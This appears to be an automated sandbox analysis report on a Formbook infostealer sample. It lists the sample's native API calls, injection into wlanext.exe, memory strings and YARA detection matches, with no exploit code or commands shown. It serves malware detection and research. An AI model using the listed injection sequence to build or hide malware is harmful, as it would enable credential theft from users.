Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_004183B0 NtAllocateVirtualMemory,	3_2_004183B0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_004181CA NtCreateFile,	3_2_004181CA
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041827A NtReadFile,	3_2_0041827A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_004182FA NtClose,	3_2_004182FA
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_00AA98F0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_00AA9860
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9840 NtDelayExecution,LdrInitializeThunk,	3_2_00AA9840
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA99A0 NtCreateSection,LdrInitializeThunk,	3_2_00AA99A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_00AA9910
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9A20 NtResumeThread,LdrInitializeThunk,	3_2_00AA9A20
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_00AA9A00
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9A50 NtCreateFile,LdrInitializeThunk,	3_2_00AA9A50
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA95D0 NtClose,LdrInitializeThunk,	3_2_00AA95D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9540 NtReadFile,LdrInitializeThunk,	3_2_00AA9540
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_00AA96E0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_00AA9660
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_00AA97A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,	3_2_00AA9780
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,	3_2_00AA9FE0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,	3_2_00AA9710
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA98A0 NtWriteVirtualMemory,	3_2_00AA98A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9820 NtEnumerateKey,	3_2_00AA9820
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AAB040 NtSuspendThread,	3_2_00AAB040
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA99D0 NtCreateProcessEx,	3_2_00AA99D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9950 NtQueueApcThread,	3_2_00AA9950
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9A80 NtOpenDirectoryObject,	3_2_00AA9A80
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9A10 NtQuerySection,	3_2_00AA9A10
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AAA3B0 NtGetContextThread,	3_2_00AAA3B0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9B00 NtSetValueKey,	3_2_00AA9B00
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA95F0 NtQueryInformationFile,	3_2_00AA95F0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9520 NtWaitForSingleObject,	3_2_00AA9520
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AAAD30 NtSetContextThread,	3_2_00AAAD30
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9560 NtWriteFile,	3_2_00AA9560
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA96D0 NtCreateKey,	3_2_00AA96D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9610 NtEnumerateValueKey,	3_2_00AA9610
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9670 NtQueryInformationProcess,	3_2_00AA9670
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9650 NtQueryValueKey,	3_2_00AA9650
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9730 NtQueryVirtualMemory,	3_2_00AA9730
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AAA710 NtOpenProcessToken,	3_2_00AAA710
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9760 NtOpenProcess,	3_2_00AA9760
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA9770 NtSetInformationFile,	3_2_00AA9770
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AAA770 NtOpenThread,	3_2_00AAA770
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_004181D0 NtCreateFile,	3_1_004181D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_00418280 NtReadFile,	3_1_00418280
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_00418300 NtClose,	3_1_00418300
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_004183B0 NtAllocateVirtualMemory,	3_1_004183B0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_004181CA NtCreateFile,	3_1_004181CA
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_0041827A NtReadFile,	3_1_0041827A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_004182FA NtClose,	3_1_004182FA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9A50 NtCreateFile,LdrInitializeThunk,	9_2_030C9A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_030C9910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C99A0 NtCreateSection,LdrInitializeThunk,	9_2_030C99A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9840 NtDelayExecution,LdrInitializeThunk,	9_2_030C9840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_030C9860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9710 NtQueryInformationToken,LdrInitializeThunk,	9_2_030C9710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9780 NtMapViewOfSection,LdrInitializeThunk,	9_2_030C9780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9FE0 NtCreateMutant,LdrInitializeThunk,	9_2_030C9FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9650 NtQueryValueKey,LdrInitializeThunk,	9_2_030C9650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_030C9660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C96D0 NtCreateKey,LdrInitializeThunk,	9_2_030C96D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C96E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_030C96E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9540 NtReadFile,LdrInitializeThunk,	9_2_030C9540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C95D0 NtClose,LdrInitializeThunk,	9_2_030C95D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9B00 NtSetValueKey,	9_2_030C9B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030CA3B0 NtGetContextThread,	9_2_030CA3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9A00 NtProtectVirtualMemory,	9_2_030C9A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9A10 NtQuerySection,	9_2_030C9A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9A20 NtResumeThread,	9_2_030C9A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9A80 NtOpenDirectoryObject,	9_2_030C9A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9950 NtQueueApcThread,	9_2_030C9950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C99D0 NtCreateProcessEx,	9_2_030C99D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9820 NtEnumerateKey,	9_2_030C9820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030CB040 NtSuspendThread,	9_2_030CB040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C98A0 NtWriteVirtualMemory,	9_2_030C98A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C98F0 NtReadVirtualMemory,	9_2_030C98F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030CA710 NtOpenProcessToken,	9_2_030CA710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9730 NtQueryVirtualMemory,	9_2_030C9730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9760 NtOpenProcess,	9_2_030C9760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030CA770 NtOpenThread,	9_2_030CA770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9770 NtSetInformationFile,	9_2_030C9770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C97A0 NtUnmapViewOfSection,	9_2_030C97A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9610 NtEnumerateValueKey,	9_2_030C9610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9670 NtQueryInformationProcess,	9_2_030C9670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9520 NtWaitForSingleObject,	9_2_030C9520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030CAD30 NtSetContextThread,	9_2_030CAD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C9560 NtWriteFile,	9_2_030C9560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C95F0 NtQueryInformationFile,	9_2_030C95F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_008681D0 NtCreateFile,	9_2_008681D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00868280 NtReadFile,	9_2_00868280
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_008683B0 NtAllocateVirtualMemory,	9_2_008683B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00868300 NtClose,	9_2_00868300
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_008681CA NtCreateFile,	9_2_008681CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_008682FA NtClose,	9_2_008682FA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086827A NtReadFile,	9_2_0086827A

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 1_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

1_2_00403166

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_004046C3	1_2_004046C3
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_004060D9	1_2_004060D9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_004068B0	1_2_004068B0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041B869	3_2_0041B869
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041C07B	3_2_0041C07B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041C804	3_2_0041C804
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00401174	3_2_00401174
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041B985	3_2_0041B985
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041CB98	3_2_0041CB98
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00408C6B	3_2_00408C6B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00408C70	3_2_00408C70
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00408C2B	3_2_00408C2B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041B4B3	3_2_0041B4B3
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041C58E	3_2_0041C58E
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041BE99	3_2_0041BE99
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041CF43	3_2_0041CF43
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041CF0C	3_2_0041CF0C
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041BFD4	3_2_0041BFD4
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041CFA2	3_2_0041CFA2
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A920A0	3_2_00A920A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B320A8	3_2_00B320A8
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7B090	3_2_00A7B090
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21002	3_2_00B21002
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A84120	3_2_00A84120
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6F900	3_2_00A6F900
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9EBB0	3_2_00A9EBB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7841F	3_2_00A7841F
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92581	3_2_00A92581
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7D5E0	3_2_00A7D5E0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A60D20	3_2_00A60D20
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B31D55	3_2_00B31D55
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A86E30	3_2_00A86E30
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_0041B869	3_1_0041B869
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_0041C07B	3_1_0041C07B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_0041C804	3_1_0041C804
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_00401030	3_1_00401030
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_00401174	3_1_00401174
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_0041B985	3_1_0041B985
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_0041CB98	3_1_0041CB98
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03152B28	9_2_03152B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BEBB0	9_2_030BEBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314DBD2	9_2_0314DBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031403DA	9_2_031403DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031522AE	9_2_031522AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308F900	9_2_0308F900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A4120	9_2_030A4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03141002	9_2_03141002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0315E824	9_2_0315E824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309B090	9_2_0309B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B20A0	9_2_030B20A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031520A8	9_2_031520A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031528EC	9_2_031528EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0315DFCE	9_2_0315DFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03151FF1	9_2_03151FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314D616	9_2_0314D616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A6E30	9_2_030A6E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03152EF7	9_2_03152EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03152D07	9_2_03152D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03080D20	9_2_03080D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03151D55	9_2_03151D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2581	9_2_030B2581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031525DD	9_2_031525DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309D5E0	9_2_0309D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0309841F	9_2_0309841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314D466	9_2_0314D466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086C804	9_2_0086C804
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086CB98	9_2_0086CB98
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00858C2B	9_2_00858C2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00858C6B	9_2_00858C6B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00858C70	9_2_00858C70
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086C58E	9_2_0086C58E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00852D90	9_2_00852D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086CFA0	9_2_0086CFA0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00852FB0	9_2_00852FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086CF0C	9_2_0086CF0C

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 0308B150 appears 45 times
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: String function: 0041A0B0 appears 52 times
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: String function: 00A6B150 appears 35 times

Source: eQLPRPErea.exe, 00000001.00000003.699812491.000000001EE2F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs eQLPRPErea.exe
Source: eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs eQLPRPErea.exe
Source: eQLPRPErea.exe, 00000003.00000002.736957220.00000000026C2000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamewlanext.exej% vs eQLPRPErea.exe

Source: eQLPRPErea.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
